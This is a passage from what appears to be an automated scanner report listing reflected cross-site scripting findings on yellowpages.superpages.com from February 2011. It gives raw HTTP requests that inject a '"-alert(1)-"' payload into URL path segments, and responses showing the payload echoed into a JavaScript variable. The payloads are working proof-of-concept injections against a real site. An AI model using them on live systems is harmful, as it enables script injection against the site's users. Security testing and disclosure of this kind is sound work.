Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/css6d043&quot;-alert(1)-&quot;ea78a66d4f3/busprofile.css
Server: Unspecified
Set-Cookie: JSESSIONID=D39CC0F55EE6FF1DCB0F7AE681BEEEFC; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:04 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
ttp://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/css6d043"-alert(1)-"ea78a66d4f3/busprofile.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.546. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/busprofile.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dd6"-alert(1)-"584c21ff5a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/css/busprofile.css14dd6"-alert(1)-"584c21ff5a6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/css/busprofile.css14dd6&quot;-alert(1)-&quot;584c21ff5a6
Server: Unspecified
Set-Cookie: JSESSIONID=A0B8DA0925D4013D343773E12EB6B2B9; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:12 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
es.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/css/busprofile.css14dd6"-alert(1)-"584c21ff5a6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.547. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46554"-alert(1)-"be25698ff9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile46554"-alert(1)-"be25698ff9/css/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile46554&quot;-alert(1)-&quot;be25698ff9/css/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=C43C42A2F651864B58C61C05BB832B63; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:58 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile46554"-alert(1)-"be25698ff9/css/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.548. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6866"-alert(1)-"0f304c70d9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/cssb6866"-alert(1)-"0f304c70d9e/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/cssb6866&quot;-alert(1)-&quot;0f304c70d9e/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=C18D83DEE8E4FAD1642CFA1B00191576; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:06 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
ttp://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/cssb6866"-alert(1)-"0f304c70d9e/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.549. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff3b0"-alert(1)-"0f9464b5bb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/css/print.cssff3b0"-alert(1)-"0f9464b5bb7 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/css/print.cssff3b0&quot;-alert(1)-&quot;0f9464b5bb7
Server: Unspecified
Set-Cookie: JSESSIONID=EB0CD557543B7B79EFDB0A2D65AFDA04; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:14 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
owpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/css/print.cssff3b0"-alert(1)-"0f9464b5bb7?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.550. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/busprofile.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49cd4"-alert(1)-"96eceb6ffe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile49cd4"-alert(1)-"96eceb6ffe4/js/busprofile.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile49cd4&quot;-alert(1)-&quot;96eceb6ffe4/js/busprofile.js
Server: Unspecified
Set-Cookie: JSESSIONID=E1DEBECF6D55BEE5047D715F190E5E85; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:11 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile49cd4"-alert(1)-"96eceb6ffe4/js/busprofile.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.551. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/busprofile.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b019f"-alert(1)-"5e23dbe0df5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/jsb019f"-alert(1)-"5e23dbe0df5/busprofile.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/jsb019f&quot;-alert(1)-&quot;5e23dbe0df5/busprofile.js
Server: Unspecified
Set-Cookie: JSESSIONID=91DA6ED19F90F3B9CFE832FC9D00294D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:20 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/jsb019f"-alert(1)-"5e23dbe0df5/busprofile.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.552. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/busprofile.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af28c"-alert(1)-"d5cdefab79b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/busprofile.jsaf28c"-alert(1)-"d5cdefab79b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/busprofile.jsaf28c&quot;-alert(1)-&quot;d5cdefab79b
Server: Unspecified
Set-Cookie: JSESSIONID=C8CAA79C6FFF661580B5A8414F30FFC0; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:29 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
ages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/busprofile.jsaf28c"-alert(1)-"d5cdefab79b?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.553. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/csiframe.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edb86"-alert(1)-"af2b6080645 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofileedb86"-alert(1)-"af2b6080645/js/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofileedb86&quot;-alert(1)-&quot;af2b6080645/js/csiframe.js
Server: Unspecified
Set-Cookie: JSESSIONID=C289443CC4D1CCC15509FEB05BD2B338; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:08 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofileedb86"-alert(1)-"af2b6080645/js/csiframe.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.554. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/csiframe.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bae2"-alert(1)-"d1c4fd37467 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js1bae2"-alert(1)-"d1c4fd37467/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js1bae2&quot;-alert(1)-&quot;d1c4fd37467/csiframe.js
Server: Unspecified
Set-Cookie: JSESSIONID=4C4E33ECA8D5BE5099B80F0F1406B058; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:17 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js1bae2"-alert(1)-"d1c4fd37467/csiframe.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.555. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/csiframe.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd87"-alert(1)-"26871eafe34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/csiframe.js1dd87"-alert(1)-"26871eafe34 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/csiframe.js1dd87&quot;-alert(1)-&quot;26871eafe34
Server: Unspecified
Set-Cookie: JSESSIONID=9AFB68F58057118BE89F30825428352B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:27 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/csiframe.js1dd87"-alert(1)-"26871eafe34?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.556. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/hide.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c75"-alert(1)-"933c529b5ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofileb3c75"-alert(1)-"933c529b5ba/js/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofileb3c75&quot;-alert(1)-&quot;933c529b5ba/js/hide.js
Server: Unspecified
Set-Cookie: JSESSIONID=A833574ACD90DE7C4B955F31362CD841; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:01 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofileb3c75"-alert(1)-"933c529b5ba/js/hide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.557. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/hide.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de57b"-alert(1)-"653154b748 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/jsde57b"-alert(1)-"653154b748/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/jsde57b&quot;-alert(1)-&quot;653154b748/hide.js
Server: Unspecified
Set-Cookie: JSESSIONID=0A571CCB92825CFBE44F2D68AAF5D862; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:09 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/jsde57b"-alert(1)-"653154b748/hide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.558. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/hide.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f72"-alert(1)-"1d6df26e138 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/hide.js30f72"-alert(1)-"1d6df26e138 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/hide.js30f72&quot;-alert(1)-&quot;1d6df26e138
Server: Unspecified
Set-Cookie: JSESSIONID=EE8F07BABFC571B292CA39BD37E9CCCB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:20 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
ellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/hide.js30f72"-alert(1)-"1d6df26e138?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.559. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/photos.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f5f"-alert(1)-"a4339366c19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile41f5f"-alert(1)-"a4339366c19/js/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
